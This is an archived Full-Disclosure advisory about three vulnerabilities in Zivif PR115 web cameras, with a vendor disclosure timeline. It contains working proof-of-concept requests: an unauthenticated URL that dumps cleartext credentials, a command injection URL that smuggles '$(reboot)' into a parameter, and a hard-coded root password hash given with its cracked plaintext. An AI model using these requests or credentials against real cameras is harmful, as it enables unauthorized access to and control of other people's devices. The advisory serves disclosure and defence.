lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 10 Dec 2017 13:18:22 -0500
From: Silas <silas.cutler@...ckListThisDomain.com>
To: fulldisclosure@...lists.org
Subject: [FD] Three exploits for Zivif Web Cameras (may impact others)

Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <silas.cutler@...cklistthisdomain.com>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103


Timeline:
1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105,
CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email


-[Overview]-
Implementation of access controls is Zivif cameras is severely lacking.
As a result, CGI functions can be called directly, bypassing
authentication checks.

This was first identified with the following request (CVE-2017-17106)
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0
Credentials are returned in cleartext to the requester.

In exploring, unauthenticated remote command injection is possible using
(CVE-2017-17105)
http://<Camera
IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)

Command results are not returned, however are executed by the system.

One last findings was the /etc/passwd file contains the following
hard-coded entry (CVE-2017-17107):
root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

The encrypted password is cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$
Because of the way the file system is structured, changing this password
requires more work then running passwd.

-[Note]-
The hi3510 is shared with a couple other cameras I'm exploring.  The
motd saying /Welcome to SONIX/ has lead me to speculate parts of this
firmware may be shared with other cameras.



-Silas


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists